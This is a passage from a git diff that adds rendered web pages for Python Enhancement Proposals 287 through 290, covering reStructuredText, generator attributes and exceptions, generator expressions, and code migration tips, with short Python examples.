    Directives are used as an extension mechanism for reStructuredText, +a way of adding support for new block-level constructs without +adding new syntax. Directives for images, admonitions (note, +caution, etc.), and tables of contents generation (among others) +have been implemented. For example, here’s how to place an image:

    +
    .. image:: mylogo.png
    +
    +
    +

    Substitution definitions allow the power and flexibility of +block-level directives to be shared by inline text. For example:

    +
    The |biohazard| symbol must be used on containers used to
    +dispose of medical waste.
    +
    +.. |biohazard| image:: biohazard.png
    +
    +
    +
  • +
  • Section structure markup.

    Section headers in reStructuredText use adornment via underlines +(and possibly overlines) rather than indentation. For example:

    +
    This is a Section Title
    +=======================
    +
    +This is a Subsection Title
    +--------------------------
    +
    +This paragraph is in the subsection.
    +
    +This is Another Section Title
    +=============================
    +
    +This paragraph is in the second section.
    +
    +
    +
  • +
+
+
+

Questions & Answers

+
    +
  1. Is reStructuredText rich enough?

    Yes, it is for most people. If it lacks some construct that is +required for a specific application, it can be added via the +directive mechanism. If a useful and common construct has been +overlooked and a suitably readable syntax can be found, it can be +added to the specification and parser.

    +
  2. Is reStructuredText too rich?

    For specific applications or individuals, perhaps. In general, no.

    +

    Since the very beginning, whenever a docstring markup syntax has +been proposed on the Doc-SIG, someone has complained about the +lack of support for some construct or other. The reply was often +something like, “These are docstrings we’re talking about, and +docstrings shouldn’t have complex markup.” The problem is that a +construct that seems superfluous to one person may be absolutely +essential to another.

    +

    reStructuredText takes the opposite approach: it provides a rich +set of implicit markup constructs (plus a generic extension +mechanism for explicit markup), allowing for all kinds of +documents. If the set of constructs is too rich for a particular +application, the unused constructs can either be removed from the +parser (via application-specific overrides) or simply omitted by +convention.

    +
  3. Why not use indentation for section structure, like StructuredText +does? Isn’t it more “Pythonic”?

    Guido van Rossum wrote the following in a 2001-06-13 Doc-SIG post:

    +
    +
    I still think that using indentation to indicate sectioning is +wrong. If you look at how real books and other print +publications are laid out, you’ll notice that indentation is +used frequently, but mostly at the intra-section level. +Indentation can be used to offset lists, tables, quotations, +examples, and the like. (The argument that docstrings are +different because they are input for a text formatter is wrong: +the whole point is that they are also readable without +processing.)

    I reject the argument that using indentation is Pythonic: text +is not code, and different traditions and conventions hold. +People have been presenting text for readability for over 30 +centuries. Let’s not innovate needlessly.

    +
    +

    See Section Structure via Indentation in Problems With +StructuredText for further elaboration.

    +
  4. Why use reStructuredText for PEPs? What’s wrong with the existing +standard?

    The existing standard for PEPs is very limited in terms of general +expressibility, and referencing is especially lacking for such a +reference-rich document type. PEPs are currently converted into +HTML, but the results (mostly monospaced text) are less than +attractive, and most of the value-added potential of HTML +(especially inline hyperlinks) is untapped.

    +

    Making reStructuredText a standard markup for PEPs will enable much +richer expression, including support for section structure, inline +markup, graphics, and tables. In several PEPs there are ASCII +graphics diagrams, which are all that plaintext documents can +support. Since PEPs are made available in HTML form, the ability +to include proper diagrams would be immediately useful.

    +

    Current PEP practices allow for reference markers in the form “[1]” +in the text, and the footnotes/references themselves are listed in +a section toward the end of the document. There is currently no +hyperlinking between the reference marker and the +footnote/reference itself (it would be possible to add this to +pep2html.py, but the “markup” as it stands is ambiguous and +mistakes would be inevitable). A PEP with many references (such as +this one ;-) requires a lot of flipping back and forth. When +revising a PEP, often new references are added or unused references +deleted. It is painful to renumber the references, since it has to +be done in two places and can have a cascading effect (insert a +single new reference 1, and every other reference has to be +renumbered; always adding new references to the end is suboptimal). +It is easy for references to go out of sync.

    +

    PEPs use references for two purposes: simple URL references and +footnotes. reStructuredText differentiates between the two. A PEP +might contain references like this:

    +
    Abstract
    +
    +    This PEP proposes adding frungible doodads [1] to the core.
    +    It extends PEP 9876 [2] via the BCA [3] mechanism.
    +
    +...
    +
    +References and Footnotes
    +
    +    [1] http://www.example.org/
    +
    +    [2] PEP 9876, Let's Hope We Never Get Here
    +        http://peps.python.org/pep-9876/
    +
    +    [3] "Bogus Complexity Addition"
    +
    +
    +

    Reference 1 is a simple URL reference. Reference 2 is a footnote +containing text and a URL. Reference 3 is a footnote containing +text only. Rewritten using reStructuredText, this PEP could look +like this:

    +
    Abstract
    +========
    +
    +This PEP proposes adding `frungible doodads`_ to the core.  It
    +extends PEP 9876 [#pep9876]_ via the BCA [#]_ mechanism.
    +
    +...
    +
    +References & Footnotes
    +======================
    +
    +.. _frungible doodads: http://www.example.org/
    +
    +.. [#pep9876] PEP 9876, Let's Hope We Never Get Here
    +
    +.. [#] "Bogus Complexity Addition"
    +
    +
    +

    URLs and footnotes can be defined close to their references if +desired, making them easier to read in the source text, and making +the PEPs easier to revise. The “References and Footnotes” section +can be auto-generated with a document tree transform. Footnotes +from throughout the PEP would be gathered and displayed under a +standard header. If URL references should likewise be written out +explicitly (in citation form), another tree transform could be +used.

    +

    URL references can be named (“frungible doodads”), and can be +referenced from multiple places in the document without additional +definitions. When converted to HTML, references will be replaced +with inline hyperlinks (HTML <a> tags). The two footnotes are +automatically numbered, so they will always stay in sync. The +first footnote also contains an internal reference name, “pep9876”, +so it’s easier to see the connection between reference and footnote +in the source text. Named footnotes can be referenced multiple +times, maintaining consistent numbering.

    +

    The “#pep9876” footnote could also be written in the form of a +citation:

    +
    It extends PEP 9876 [PEP9876]_ ...
    +
    +.. [PEP9876] PEP 9876, Let's Hope We Never Get Here
    +
    +
    +

    Footnotes are numbered, whereas citations use text for their +references.

    +
  5. Wouldn’t it be better to keep the docstring and PEP proposals +separate?

    The PEP markup proposal may be removed if it is deemed that there +is no need for PEP markup, or it could be made into a separate PEP. +If accepted, PEP 1, PEP Purpose and Guidelines, and PEP 9, +Sample PEP Template will be updated.

    +

    It seems natural to adopt a single consistent markup standard for +all uses of structured plaintext in Python, and to propose it all +in one place.

    +
  6. The existing pep2html.py script converts the existing PEP format to +HTML. How will the new-format PEPs be converted to HTML?

    A new version of pep2html.py with integrated reStructuredText +parsing has been completed. The Docutils project supports PEPs +with a “PEP Reader” component, including all functionality +currently in pep2html.py (auto-recognition of PEP & RFC references, +email masking, etc.).

    +
  7. Who’s going to convert the existing PEPs to reStructuredText?

    PEP authors or volunteers may convert existing PEPs if they like, +but there is no requirement to do so. The reStructuredText-based +PEPs will coexist with the old PEP standard. The pep2html.py +mentioned in answer 6 processes both old and new standards.

    +
  8. Why use reStructuredText for README and other ancillary files?

    The reasoning given for PEPs in answer 4 above also applies to +README and other ancillary files. By adopting a standard markup, +these files can be converted to attractive cross-referenced HTML +and put up on python.org. Developers of other projects can also +take advantage of this facility for their own documentation.

    +
  9. Won’t the superficial similarity to existing markup conventions +cause problems, and result in people writing invalid markup (and +not noticing, because the plaintext looks natural)? How forgiving +is reStructuredText of “not quite right” markup?

    There will be some mis-steps, as there would be when moving from +one programming language to another. As with any language, +proficiency grows with experience. Luckily, reStructuredText is a +very little language indeed.

    +

    As with any syntax, there is the possibility of syntax errors. It +is expected that a user will run the processing system over their +input and check the output for correctness.

    +

    In a strict sense, the reStructuredText parser is very unforgiving +(as it should be; “In the face of ambiguity, refuse the temptation +to guess” applies to parsing markup as well as computer +languages). Here’s design goal 3 from An Introduction to +reStructuredText:

    +
    +
    Unambiguous. The rules for markup must not be open for +interpretation. For any given input, there should be one and +only one possible output (including error output).
    +

    While unforgiving, at the same time the parser does try to be +helpful by producing useful diagnostic output (“system messages”). +The parser reports problems, indicating their level of severity +(from least to most: debug, info, warning, error, severe). The +user or the client software can decide on reporting thresholds; +they can ignore low-level problems or cause high-level problems to +bring processing to an immediate halt. Problems are reported +during the parse as well as included in the output, often with +two-way links between the source of the problem and the system +message explaining it.

    +
  10. Will the docstrings in the Python standard library modules be +converted to reStructuredText?

    No. Python’s library reference documentation is maintained +separately from the source. Docstrings in the Python standard +library should not try to duplicate the library reference +documentation. The current policy for docstrings in the Python +standard library is that they should be no more than concise +hints, simple and markup-free (although many do contain ad-hoc +implicit markup).

    +
  11. I want to write all my strings in Unicode. Will anything +break?

    The parser fully supports Unicode. Docutils supports arbitrary +input and output encodings.

    +
  12. Why does the community need a new structured text design?

    The existing structured text designs are deficient, for the +reasons given in “Rationale” above. reStructuredText aims to be a +complete markup syntax, within the limitations of the “readable +plaintext” medium.

    +
  13. What is wrong with existing documentation methodologies?

    What existing methodologies? For Python docstrings, there is +no official standard markup format, let alone a documentation +methodology akin to JavaDoc. The question of methodology is at a +much higher level than syntax (which this PEP addresses). It is +potentially much more controversial and difficult to resolve, and +is intentionally left out of this discussion.

    +
+
+ +
+

Acknowledgements

+

Some text is borrowed from PEP 216, Docstring Format, by +Moshe Zadka.

+

Special thanks to all members past & present of the Python Doc-SIG.

+
+
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0287.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0288/index.html b/pep-0288/index.html new file mode 100644 index 00000000000..f3927937e64 --- /dev/null +++ b/pep-0288/index.html @@ -0,0 +1,261 @@ + PEP 288 – Generators Attributes and Exceptions | peps.python.org +
+
+


+ + +
+
+
+

PEP 288 – Generators Attributes and Exceptions

+
+
Author:
+
Raymond Hettinger <python at rcn.com>
+
Status:
+
Withdrawn
+
Type:
+
Standards Track
+
Created:
+
21-Mar-2002
+
Python-Version:
+
2.5
+
Post-History:
+

+
+
+
+
+
+

Abstract

+

This PEP proposes to enhance generators by providing mechanisms for +raising exceptions and sharing data with running generators.

+
+
+

Status

+

This PEP is withdrawn. The exception raising mechanism was extended +and subsumed into PEP 343. The attribute passing capability +never built a following, did not have a clear implementation, +and did not have a clean way for the running generator to access +its own namespace.

+
+
+

Rationale

+

Currently, only class based iterators can provide attributes and +exception handling. However, class based iterators are harder to +write, less compact, less readable, and slower. A better solution +is to enable these capabilities for generators.
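
For comparison, here is a sketch (modern Python 3, not from the PEP) of the
class-based equivalent of the mygen() example shown in the Specification
below; the attributes come for free, at the cost of noticeably more
boilerplate:

    class LineReader:
        """Class-based iterator exposing a 'pos' attribute."""

        def __init__(self, filename):
            self.myfile = open(filename)
            self.pos = 0

        def __iter__(self):
            return self

        def __next__(self):
            while True:
                line = self.myfile.readline()
                if not line:                 # end of file
                    self.myfile.close()
                    raise StopIteration
                if len(line) >= 10:
                    self.pos = self.myfile.tell()
                    return line.upper()

    g = LineReader('sample.txt')
    line1 = next(g)
    print('Position', g.pos)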

+

Enabling attribute assignments allows data to be passed to and from +running generators. The approach of sharing data using attributes +pervades Python. Other approaches exist but are somewhat hackish +in comparison.

+

Another evolutionary step is to add a generator method to allow +exceptions to be passed to a generator. Currently, there is no +clean method for triggering exceptions from outside the generator. +Also, generator exception passing helps mitigate the try/finally +prohibition for generators. The need is especially acute for +generators needing to flush buffers or close resources upon termination.

+

The two proposals are backwards compatible and require no new +keywords. They are being recommended for Python version 2.5.

+
+
+

Specification for Generator Attributes

+

Essentially, the proposal is to emulate attribute writing for classes. +The only wrinkle is that generators lack a way to refer to instances of +themselves. So, the proposal is to provide a function for discovering +the reference. For example:

+
def mygen(filename):
+    self = sys.get_generator()
+    myfile = open(filename)
+    for line in myfile:
+        if len(line) < 10:
+            continue
+        self.pos = myfile.tell()
+        yield line.upper()
+
+g = mygen('sample.txt')
+line1 = g.next()
+print 'Position', g.pos
+
+
+

Uses for generator attributes include:

+
    +
  1. Providing generator clients with extra information (as shown +above).
  2. Externally setting control flags governing generator operation +(possibly telling a generator when to step in or step over +data groups).
  3. Writing lazy consumers with complex execution states +(an arithmetic encoder output stream for example).
  4. Writing co-routines (as demonstrated in Dr. Mertz’s articles [1]).
+

The control flow of ‘yield’ and ‘next’ is unchanged by this +proposal. The only change is that data can passed to and from the +generator. Most of the underlying machinery is already in place, +only the access function needs to be added.
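
As a historical footnote by way of example: two-way data flow of this kind
did eventually reach the language in a different form, the send() method
added to generators in Python 2.5. A minimal modern sketch (this is not
the attribute-based API proposed above):

    def running_total():
        total = 0
        while True:
            value = yield total     # receives whatever the caller send()s
            if value is not None:
                total += value

    g = running_total()
    next(g)              # prime the generator to its first yield
    print(g.send(10))    # 10
    print(g.send(5))     # 15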

+
+
+

Specification for Generator Exception Passing

+

Add a .throw(exception) method to the generator interface:

+
def logger():
+    start = time.time()
+    log = []
+    try:
+        while True:
+            log.append(time.time() - start)
+            yield log[-1]
+    except WriteLog:
+        writelog(log)
+
+g = logger()
+for i in [10,20,40,80,160]:
+    testsuite(i)
+    g.next()
+g.throw(WriteLog)
+
+
+

There is no existing work-around for triggering an exception +inside a generator. It is the only case in Python where active +code cannot be excepted to or through.

+

Generator exception passing also helps address an intrinsic +limitation on generators, the prohibition against their using +try/finally to trigger clean-up code (PEP 255).

+

Note A: The name of the throw method was selected for several +reasons. Raise is a keyword and so cannot be used as a method +name. Unlike raise which immediately raises an exception from the +current execution point, throw will first return to the generator +and then raise the exception. The word throw is suggestive of +putting the exception in another location. The word throw is +already associated with exceptions in other languages.

+

Alternative method names were considered: resolve(), signal(), +genraise(), raiseinto(), and flush(). None of these fit as well +as throw().

+

Note B: To keep the throw() syntax simple only the instance +version of the raise syntax would be supported (no variants for +“raise string” or “raise class, instance”).

+

Calling g.throw(instance) would correspond to writing +raise instance immediately after the most recent yield.

+
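The throw() method proposed here was eventually added to generators by PEP 342, so the interface can be exercised in modern Python. A hedged, runnable sketch of the logger example (the flush message is illustrative):

import time

class WriteLog(Exception):
    pass

def logger():
    start = time.time()
    log = []
    try:
        while True:
            log.append(time.time() - start)
            yield log[-1]
    except WriteLog:
        print('flushing %d entries' % len(log))

g = logger()
next(g)                   # run to the first yield
try:
    g.throw(WriteLog)     # raised at the paused yield expression
except StopIteration:
    pass                  # the generator handled WriteLog and finished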
+
+

References

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0288.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0289/index.html b/pep-0289/index.html new file mode 100644 index 00000000000..b4f7b000429 --- /dev/null +++ b/pep-0289/index.html @@ -0,0 +1,406 @@ + + + + + + + + PEP 289 – Generator Expressions | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 289 – Generator Expressions

+
+
Author:
+
Raymond Hettinger <python at rcn.com>
+
Status:
+
Final
+
Type:
+
Standards Track
+
Created:
+
30-Jan-2002
+
Python-Version:
+
2.4
+
Post-History:
+
22-Oct-2003
+
+
+
+
Table of Contents +
+
+

Abstract

+

This PEP introduces generator expressions as a high performance, +memory efficient generalization of list comprehensions PEP 202 and +generators PEP 255.

+
+
+

Rationale

+

Experience with list comprehensions has shown their widespread +utility throughout Python. However, many of the use cases do +not need to have a full list created in memory. Instead, they +only need to iterate over the elements one at a time.

+

For instance, the following summation code will build a full list of +squares in memory, iterate over those values, and, when the reference +is no longer needed, delete the list:

+
sum([x*x for x in range(10)])
+
+
+

Memory is conserved by using a generator expression instead:

+
sum(x*x for x in range(10))
+
+
+

Similar benefits are conferred on constructors for container objects:

+
s = set(word  for line in page  for word in line.split())
+d = dict( (k, func(k)) for k in keylist)
+
+
+

Generator expressions are especially useful with functions like sum(), +min(), and max() that reduce an iterable input to a single value:

+
max(len(line)  for line in file  if line.strip())
+
+
+

Generator expressions also address some examples of functionals coded +with lambda:

+
reduce(lambda s, a: s + a.myattr, data, 0)
+reduce(lambda s, a: s + a[3], data, 0)
+
+
+

These simplify to:

+
sum(a.myattr for a in data)
+sum(a[3] for a in data)
+
+
+

List comprehensions greatly reduced the need for filter() and map(). +Likewise, generator expressions are expected to minimize the need +for itertools.ifilter() and itertools.imap(). In contrast, the +utility of other itertools will be enhanced by generator expressions:

+
dotproduct = sum(x*y for x,y in itertools.izip(x_vector, y_vector))
+
+
+

Having a syntax similar to list comprehensions also makes it easy to convert existing code into a generator expression when scaling up an application.

+

Early timings showed that generators had a significant performance +advantage over list comprehensions. However, the latter were highly +optimized for Py2.4 and now the performance is roughly comparable +for small to mid-sized data sets. As the data volumes grow larger, +generator expressions tend to perform better because they do not +exhaust cache memory and they allow Python to re-use objects between +iterations.

+
+
+

BDFL Pronouncements

+

This PEP is ACCEPTED for Py2.4.

+
+
+

The Details

+

(None of this is exact enough in the eye of a reader from Mars, but I +hope the examples convey the intention well enough for a discussion in +c.l.py. The Python Reference Manual should contain a 100% exact +semantic and syntactic specification.)

+
    +
  1. The semantics of a generator expression are equivalent to creating +an anonymous generator function and calling it. For example:
    g = (x**2 for x in range(10))
    +print g.next()
    +
    +
    +

    is equivalent to:

    +
    def __gen(exp):
    +    for x in exp:
    +        yield x**2
    +g = __gen(iter(range(10)))
    +print g.next()
    +
    +
    +

    Only the outermost for-expression is evaluated immediately, the other +expressions are deferred until the generator is run:

    +
    g = (tgtexp  for var1 in exp1 if exp2 for var2 in exp3 if exp4)
    +
    +
    +

    is equivalent to:

    +
    def __gen(bound_exp):
    +    for var1 in bound_exp:
    +        if exp2:
    +            for var2 in exp3:
    +                if exp4:
    +                    yield tgtexp
    +g = __gen(iter(exp1))
    +del __gen
    +
    +
    +
  2. +
  3. The syntax requires that a generator expression always needs to be +directly inside a set of parentheses and cannot have a comma on +either side. With reference to the file Grammar/Grammar in CVS, +two rules change:
      +
    1. The rule:
      atom: '(' [testlist] ')'
      +
      +
      +

      changes to:

      +
      atom: '(' [testlist_gexp] ')'
      +
      +
      +

      where testlist_gexp is almost the same as listmaker, but only +allows a single test after ‘for’ … ‘in’:

      +
      testlist_gexp: test ( gen_for | (',' test)* [','] )
      +
      +
      +
    2. +
    3. The rule for arglist needs similar changes.
    4. +
    +

    This means that you can write:

    +
    sum(x**2 for x in range(10))
    +
    +
    +

    but you would have to write:

    +
    reduce(operator.add, (x**2 for x in range(10)))
    +
    +
    +

    and also:

    +
    g = (x**2 for x in range(10))
    +
    +
    +

    i.e. if a function call has a single positional argument, it can be +a generator expression without extra parentheses, but in all other +cases you have to parenthesize it.

    +

    The exact details were checked in to Grammar/Grammar version 1.49.

    +
  4. +
  5. The loop variable (if it is a simple variable or a tuple of simple +variables) is not exposed to the surrounding function. This +facilitates the implementation and makes typical use cases more +reliable. In some future version of Python, list comprehensions +will also hide the induction variable from the surrounding code +(and, in Py2.4, warnings will be issued for code accessing the +induction variable).

    For example:

    +
    x = "hello"
    +y = list(x for x in "abc")
    +print x    # prints "hello", not "c"
    +
    +
    +
  6. +
  7. List comprehensions will remain unchanged. For example:
    [x for x in S]    # This is a list comprehension.
    +[(x for x in S)]  # This is a list containing one generator
    +                  # expression.
    +
    +
    +

    Unfortunately, there is currently a slight syntactic difference. +The expression:

    +
    [x for x in 1, 2, 3]
    +
    +
    +

    is legal, meaning:

    +
    [x for x in (1, 2, 3)]
    +
    +
    +

    But generator expressions will not allow the former version:

    +
    (x for x in 1, 2, 3)
    +
    +
    +

    is illegal.

    +

    The former list comprehension syntax will become illegal in Python +3.0, and should be deprecated in Python 2.4 and beyond.

    +

    List comprehensions also “leak” their loop variable into the +surrounding scope. This will also change in Python 3.0, so that +the semantic definition of a list comprehension in Python 3.0 will +be equivalent to list(<generator expression>). Python 2.4 and +beyond should issue a deprecation warning if a list comprehension’s +loop variable has the same name as a variable used in the +immediately surrounding scope.

    +
  8. +
+
+
+

Early Binding versus Late Binding

+

After much discussion, it was decided that the first (outermost) +for-expression should be evaluated immediately and that the remaining +expressions be evaluated when the generator is executed.

+

Asked to summarize the reasoning for binding the first expression, +Guido offered [1]:

+
Consider sum(x for x in foo()). Now suppose there's a bug in foo()
+that raises an exception, and a bug in sum() that raises an
+exception before it starts iterating over its argument. Which
+exception would you expect to see? I'd be surprised if the one in
+sum() was raised rather than the one in foo(), since the call to foo()
+is part of the argument to sum(), and I expect arguments to be
+processed before the function is called.
+
+OTOH, in sum(bar(x) for x in foo()), where sum() and foo()
+are bugfree, but bar() raises an exception, we have no choice but
+to delay the call to bar() until sum() starts iterating -- that's
+part of the contract of generators. (They do nothing until their
+next() method is first called.)
+
+
+
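A small sketch illustrating the decided semantics (the function name is made up): the call producing the outermost iterable runs at definition time, so its errors surface immediately, before any iteration:

def foo():
    raise RuntimeError('broken iterable source')

try:
    g = (x for x in foo())   # outermost iterable is evaluated eagerly
except RuntimeError as e:
    print('raised at definition time:', e)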

Various use cases were proposed for binding all free variables when +the generator is defined. And some proponents felt that the resulting +expressions would be easier to understand and debug if bound immediately.

+

However, Python takes a late binding approach to lambda expressions and has no precedent for automatic, early binding. It was felt that introducing a new paradigm would add unnecessary complexity.

+

After exploring many possibilities, a consensus emerged that binding +issues were hard to understand and that users should be strongly +encouraged to use generator expressions inside functions that consume +their arguments immediately. For more complex applications, full +generator definitions are always superior in terms of being obvious +about scope, lifetime, and binding [2].

+
+
+

Reduction Functions

+

The utility of generator expressions is greatly enhanced when combined +with reduction functions like sum(), min(), and max(). The heapq +module in Python 2.4 includes two new reduction functions: nlargest() +and nsmallest(). Both work well with generator expressions and keep +no more than n items in memory at one time.

+
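For illustration (sample data made up), combining the reduction functions with generator expressions; both calls keep no more than n items in memory:

import heapq

data = [11, 3, 17, 8, 25, 6]
print(heapq.nlargest(3, (x * x for x in data)))    # [625, 289, 121]
print(heapq.nsmallest(2, (x * x for x in data)))   # [9, 36]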
+
+

Acknowledgements

+
    +
  • Raymond Hettinger first proposed the idea of “generator +comprehensions” in January 2002.
  • +
  • Peter Norvig resurrected the discussion in his proposal for +Accumulation Displays.
  • +
  • Alex Martelli provided critical measurements that proved the +performance benefits of generator expressions. He also provided +strong arguments that they were a desirable thing to have.
  • +
  • Phillip Eby suggested “iterator expressions” as the name.
  • +
  • Subsequently, Tim Peters suggested the name “generator expressions”.
  • +
  • Armin Rigo, Tim Peters, Guido van Rossum, Samuele Pedroni, +Hye-Shik Chang and Raymond Hettinger teased out the issues surrounding +early versus late binding [1].
  • +
  • Jiwon Seo single-handedly implemented various versions of the proposal +including the final version loaded into CVS. Along the way, there +were periodic code reviews by Hye-Shik Chang and Raymond Hettinger. +Guido van Rossum made the key design decisions after comments from +Armin Rigo and newsgroup discussions. Raymond Hettinger provided +the test suite, documentation, tutorial, and examples [2].
  • +
+
+
+

References

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0289.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0290/index.html b/pep-0290/index.html new file mode 100644 index 00000000000..db1d7193a08 --- /dev/null +++ b/pep-0290/index.html @@ -0,0 +1,606 @@ + + + + + + + + PEP 290 – Code Migration and Modernization | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 290 – Code Migration and Modernization

+
+
Author:
+
Raymond Hettinger <python at rcn.com>
+
Status:
+
Active
+
Type:
+
Informational
+
Created:
+
06-Jun-2002
+
Post-History:
+

+
+
+
+
Table of Contents +
+
+

Abstract

+

This PEP is a collection of procedures and ideas for updating Python +applications when newer versions of Python are installed.

+

The migration tips highlight possible areas of incompatibility and +make suggestions on how to find and resolve those differences. The +modernization procedures show how older code can be updated to take +advantage of new language features.

+
+
+

Rationale

+

This repository of procedures serves as a catalog or checklist of +known migration issues and procedures for addressing those issues.

+

Migration issues can arise for several reasons. Some obsolete +features are slowly deprecated according to the guidelines in PEP 4. +Also, some code relies on undocumented behaviors which are +subject to change between versions. Some code may rely on behavior +which was subsequently shown to be a bug and that behavior changes +when the bug is fixed.

+

Modernization options arise when new versions of Python add features +that allow improved clarity or higher performance than previously +available.

+
+
+

Guidelines for New Entries

+

Developers with commit access may update this PEP directly. Others +can send their ideas to a developer for possible inclusion.

+

While a consistent format makes the repository easier to use, feel +free to add or subtract sections to improve clarity.

+

Grep patterns may be supplied as a tool to help maintainers locate code for possible updates. However, fully automated search/replace style regular expressions are not recommended. Instead, each code fragment should be evaluated individually.

+

The contra-indications section is the most important part of a new +entry. It lists known situations where the update SHOULD NOT be +applied.

+
+
+

Migration Issues

+
+

Comparison Operators Not a Shortcut for Producing 0 or 1

+

Prior to Python 2.3, comparison operations returned 0 or 1 rather +than True or False. Some code may have used this as a shortcut for +producing zero or one in places where their boolean counterparts are +not appropriate. For example:

+
def identity(m=1):
+    """Create and m-by-m identity matrix"""
+    return [[i==j for i in range(m)] for j in range(m)]
+
+
+

In Python 2.2, a call to identity(2) would produce:

+
[[1, 0], [0, 1]]
+
+
+

In Python 2.3, the same call would produce:

+
[[True, False], [False, True]]
+
+
+

Since booleans are a subclass of integers, the matrix would continue +to calculate normally, but it will not print as expected. The list +comprehension should be changed to read:

+
return [[int(i==j) for i in range(m)] for j in range(m)]
+
+
+

There are similar concerns when storing data to be used by other +applications which may expect a number instead of True or False.

+
+
+
+

Modernization Procedures

+

Procedures are grouped by the Python version required to be able to +take advantage of the modernization.

+
+

Python 2.4 or Later

+
+

Inserting and Popping at the Beginning of Lists

+

Python’s lists are implemented to perform best with appends and pops on the right. Use of pop(0) or insert(0, x) triggers O(n) data movement for the entire list. To help address this need, Python 2.4 introduces a new container, collections.deque(), which has efficient append and pop operations on both the left and right (the trade-off is much slower getitem/setitem access). The new container is especially helpful for implementing data queues:

+

Pattern:

+
c = list(data)   -->   c = collections.deque(data)
+c.pop(0)         -->   c.popleft()
+c.insert(0, x)   -->   c.appendleft(x)
+
+
+

Locating:

+
grep pop(0 or
+grep insert(0
+
+
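A short runnable sketch of the pattern as a work queue (names are illustrative):

from collections import deque

queue = deque(['task1', 'task2'])
queue.append('task3')        # enqueue on the right, O(1)
print(queue.popleft())       # task1 -- dequeue on the left, O(1)
queue.appendleft('urgent')   # O(1), unlike list.insert(0, x)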
+
+
+

Simplifying Custom Sorts

+

In Python 2.4, the sort method for lists and the new sorted built-in function both accept a key function for computing sort keys. Unlike the cmp function, which gets applied to every comparison, the key function gets applied only once to each record. It is much faster than cmp and typically more readable while using less code. The key function also maintains the stability of the sort (records with the same key are left in their original order).

+

Original code using a comparison function:

+
names.sort(lambda x,y: cmp(x.lower(), y.lower()))
+
+
+

Alternative original code with explicit decoration:

+
tempnames = [(n.lower(), n) for n in names]
+tempnames.sort()
+names = [original for decorated, original in tempnames]
+
+
+

Revised code using a key function:

+
names.sort(key=str.lower)       # case-insensitive sort
+
+
+

Locating: grep sort *.py

+
+
+

Replacing Common Uses of Lambda

+

In Python 2.4, the operator module gained two new functions, +itemgetter() and attrgetter() that can replace common uses of +the lambda keyword. The new functions run faster and +are considered by some to improve readability.

+

Pattern:

+
lambda r: r[2]      -->  itemgetter(2)
+lambda r: r.myattr  -->  attrgetter('myattr')
+
+
+

Typical contexts:

+
sort(studentrecords, key=attrgetter('gpa'))   # set a sort field
+map(attrgetter('lastname'), studentrecords)   # extract a field
+
+
+

Locating: grep lambda *.py

+
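A self-contained sketch of both helpers (the records are made up):

from operator import attrgetter, itemgetter

rows = [('bob', 3.1), ('ann', 3.9), ('cid', 2.7)]
print(sorted(rows, key=itemgetter(1)))   # sort by the second field

class Student:
    def __init__(self, name, gpa):
        self.name, self.gpa = name, gpa

students = [Student('bob', 3.1), Student('ann', 3.9)]
print(max(students, key=attrgetter('gpa')).name)   # ann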
+
+

Simplified Reverse Iteration

+

Python 2.4 introduced the reversed builtin function for reverse +iteration. The existing approaches to reverse iteration suffered +from wordiness, performance issues (speed and memory consumption), +and/or lack of clarity. A preferred style is to express the +sequence in a forwards direction, apply reversed to the result, +and then loop over the resulting fast, memory friendly iterator.

+

Original code expressed with half-open intervals:

+
for i in range(n-1, -1, -1):
+    print seqn[i]
+
+
+

Alternative original code reversed in multiple steps:

+
rseqn = list(seqn)
+rseqn.reverse()
+for value in rseqn:
+    print value
+
+
+

Alternative original code expressed with extending slicing:

+
for value in seqn[::-1]:
+    print value
+
+
+

Revised code using the reversed function:

+
for value in reversed(seqn):
+    print value
+
+
+
+
+
+

Python 2.3 or Later

+
+

Testing String Membership

+

In Python 2.3, for string2 in string1, the length restriction on +string2 is lifted; it can now be a string of any length. When +searching for a substring, where you don’t care about the position of +the substring in the original string, using the in operator makes +the meaning clear.

+

Pattern:

+
string1.find(string2) >= 0   -->  string2 in string1
+string1.find(string2) != -1  -->  string2 in string1
+
+
+
+
+

Replace apply() with a Direct Function Call

+

In Python 2.3, apply() was marked for Pending Deprecation because it +was made obsolete by Python 1.6’s introduction of * and ** in +function calls. Using a direct function call was always a little +faster than apply() because it saved the lookup for the builtin. +Now, apply() is even slower due to its use of the warnings module.

+

Pattern:

+
apply(f, args, kwds)  -->  f(*args, **kwds)
+
+
+

Note: The Pending Deprecation was removed from apply() in Python 2.3.3 +since it creates pain for people who need to maintain code that works +with Python versions as far back as 1.5.2, where there was no +alternative to apply(). The function remains deprecated, however.

+
+
+
+

Python 2.2 or Later

+
+

Testing Dictionary Membership

+

For testing dictionary membership, use the ‘in’ keyword instead of the +‘has_key()’ method. The result is shorter and more readable. The +style becomes consistent with tests for membership in lists. The +result is slightly faster because has_key requires an attribute +search and uses a relatively expensive function call.

+

Pattern:

+
if d.has_key(k):  -->  if k in d:
+
+
+

Contra-indications:

+
    +
  1. Some dictionary-like objects may not define a +__contains__() method:
    if dictlike.has_key(k)
    +
    +
    +
  2. +
+

Locating: grep has_key

+
+
+

Looping Over Dictionaries

+

Use the new iter methods for looping over dictionaries. The +iter methods are faster because they do not have to create a new +list object with a complete copy of all of the keys, values, or items. +Selecting only keys, values, or items (key/value pairs) as needed +saves the time for creating throwaway object references and, in the +case of items, saves a second hash look-up of the key.

+

Pattern:

+
for key in d.keys():      -->  for key in d:
+for value in d.values():  -->  for value in d.itervalues():
+for key, value in d.items():
+                          -->  for key, value in d.iteritems():
+
+
+

Contra-indications:

+
    +
  1. If you need a list, do not change the return type:
    def getids():  return d.keys()
    +
    +
    +
  2. +
